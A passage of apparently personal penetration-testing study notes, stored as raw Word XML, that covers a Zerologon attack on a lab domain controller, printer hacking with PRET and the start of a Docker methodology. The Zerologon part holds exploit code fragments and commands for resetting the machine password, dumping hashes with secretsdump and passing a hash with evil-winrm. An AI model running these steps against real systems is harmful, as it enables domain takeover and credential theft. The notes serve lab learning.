    <w:p w14:paraId="60BF5E1C" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    auth['Credential'] = b'\x00' * 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A33D0" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    auth['Timestamp'] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F26BA8" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    newPassRequest['Authenticator'] = auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718F59A" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    newPassRequest['ComputerName'] = target_computer + '\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43931286" w14:textId="77777777" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    newPassRequest['ClearNewPassword'] =  b'\x00' * 516</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF4482" w14:textId="6CA6BB89" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    rpc_con.request(newPassRequest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53755E65" w14:textId="5E02D0A6" w:rsidR="00FA1195" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r w:rsidR="00FA1195" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/Sq00ky/Zero-Logon-Exploit/master/zeroLogon-NullPass.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E55F374" w14:textId="6A82F68B" w:rsidR="00FA1195" w:rsidRDefault="00FA1195" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3922BD" w14:textId="45D06530" w:rsidR="00FA1195" w:rsidRDefault="00F11379" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NetrServerPasswordSet2 – allow to change passwords over NRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6C472" w14:textId="207E82BF" w:rsidR="00F11379" w:rsidRDefault="00F11379" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>seven fields required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A9C00" w14:textId="18B42EDE" w:rsidR="00F11379" w:rsidRDefault="00F11379" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Opnum 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376C247" w14:textId="43274FEA" w:rsidR="00F11379" w:rsidRDefault="00174F49" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56319860" w14:textId="6B17E820" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sV -sC &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F31019F" w14:textId="300B4426" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ID Domain Controller NetBIOS Computer Name, Domain name, and DNS_Domain_Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48E54D" w14:textId="6E13C832" w:rsidR="00174F49" w:rsidRDefault="00174F49" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo python3 zeroLogonNullPass.py &lt;NetBIOS Name of Domain Controller&gt; &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F41D14" w14:textId="37B2FD73" w:rsidR="00174F49" w:rsidRDefault="00174F49" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo python3 zeroLogonNullPass.py DC01 10.10.88.231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B1E73D" w14:textId="4A9185E2" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo secretsdump.py -just-dc -no-pass &lt;NetBIOS Name of Domain Controller&gt;\$@&lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496B0E2" w14:textId="08411096" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for admin hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325EF48" w14:textId="78C6C65B" w:rsidR="002559F6" w:rsidRDefault="002559F6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>second section of ::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629FA0D" w14:textId="4BFA7F09" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>names with “a-“ before them are admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C732A" w14:textId="776B3554" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. hololive.local\a-koronei</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E8476C" w14:textId="7CB47AA1" w:rsidR="00D11ADA" w:rsidRDefault="00D11ADA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. hololive.local\a-fubukis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D17025" w14:textId="498E0684" w:rsidR="002559F6" w:rsidRDefault="002559F6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>evil-winrm -u &lt;user&gt; -H &lt;hash&gt; -i &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689CE226" w14:textId="51A40288" w:rsidR="002559F6" w:rsidRDefault="002559F6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. sudo evil-winrm -u Administrator -H </w:t>
      </w:r>
      <w:r w:rsidR="001548E3" w:rsidRPr="001548E3">
        <w:t>3f3ef89114fb063e3d7fc23c20f65568</w:t>
      </w:r>
      <w:r w:rsidR="001548E3">
        <w:t xml:space="preserve"> -i 10.10.88.231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0205E2" w14:textId="424E7FEA" w:rsidR="001548E3" w:rsidRDefault="001548E3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>get into computer and do work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E1650" w14:textId="1D1EEDC9" w:rsidR="001548E3" w:rsidRDefault="001548E3" w:rsidP="001548E3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0577BF7D" w14:textId="4C63C87A" w:rsidR="001548E3" w:rsidRDefault="000119DA" w:rsidP="001548E3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Printer Hacking 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0ECE35" w14:textId="5015C724" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IPP Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85A1BE" w14:textId="436EC3CD" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reason for vulnerability is open IPP port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A7740" w14:textId="5A7B3B9D" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Internet Printing Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AAE23B" w14:textId="57C80C98" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>protocol for communication between client devices and printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30980992" w14:textId="28BEC76D" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when open to internet, possible for anyone to print to the printer or transfer malicious data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F55ABE" w14:textId="4C976D03" w:rsidR="000119DA" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r w:rsidR="000119DA" w:rsidRPr="00F4602A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.variot.eu/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="452D7BD9" w14:textId="537161B7" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>80k vulnerable printers, many running on CUPS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBE80D9" w14:textId="30CDC82D" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Port 631</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61854402" w14:textId="22EB5F58" w:rsidR="000119DA" w:rsidRDefault="000119DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Targeting and Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB57B6D" w14:textId="316EBDE0" w:rsidR="000119DA" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r w:rsidR="000119DA" w:rsidRPr="00F4602A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/RUB-NDS/PRET</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31DCB259" w14:textId="31E4EC7A" w:rsidR="000119DA" w:rsidRDefault="005E6EBB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Try all three languages to check which the printer will understand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650DDA3" w14:textId="348A0CD4" w:rsidR="005E6EBB" w:rsidRDefault="005E6EBB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python pret.py {IP} [ps.pjl,pcl]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AF623" w14:textId="33B257EE" w:rsidR="005E6EBB" w:rsidRDefault="005E6EBB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>returns shell-alike output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE40779" w14:textId="0142768C" w:rsidR="005E6EBB" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r w:rsidR="005E6EBB" w:rsidRPr="00F4602A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AD85F0A" w14:textId="6A7A77AF" w:rsidR="005E6EBB" w:rsidRDefault="005E6EBB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Potential Full Server Side Access Through Printer Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E6CE8" w14:textId="5BDF26FB" w:rsidR="005E6EBB" w:rsidRDefault="005E6EBB" w:rsidP="005E6EBB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22318B3D" w14:textId="2E672036" w:rsidR="005E6EBB" w:rsidRDefault="008A4F4A" w:rsidP="005E6EBB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F4105" w14:textId="49FA40EA" w:rsidR="008A4F4A" w:rsidRDefault="008A4F4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20993783" w14:textId="704FA873" w:rsidR="008A4F4A" w:rsidRDefault="008A4F4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Add Instance IP Address to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE3DE9" w14:textId="09A7DF9C" w:rsidR="008A4F4A" w:rsidRDefault="008A4F4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo nano /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A2B88" w14:textId="687F2B8D" w:rsidR="008A4F4A" w:rsidRDefault="008A4F4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;IP&gt; docker-rodeo.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B6AEBD" w14:textId="2E28271A" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>save and close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570E317" w14:textId="26288D4B" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/etc/docker/daemon.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC13B2D" w14:textId="141B3C9B" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0B224" w14:textId="0788D026" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>“insecure-registries” : [“docker-rodeo.thm:5000”,”docker-rodeo.thm:7000”]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A5E46C" w14:textId="310D3902" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6350C862" w14:textId="3805227D" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>save and close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3808D819" w14:textId="240C92F6" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>restart Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116EA111" w14:textId="3C45F577" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo systemctl stop docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E6B40A" w14:textId="4BE889F5" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33015A6A" w14:textId="43337146" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo systemctl start docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D5882" w14:textId="22399FEA" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B8865D" w14:textId="6FA02FF4" w:rsidR="001903FB" w:rsidRDefault="001903FB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is Docker?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C8AAA" w14:textId="3664E2EC" w:rsidR="001903FB" w:rsidRDefault="00243659" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for application development using containerization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57625159" w14:textId="2CC44A77" w:rsidR="00243659" w:rsidRDefault="00243659" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
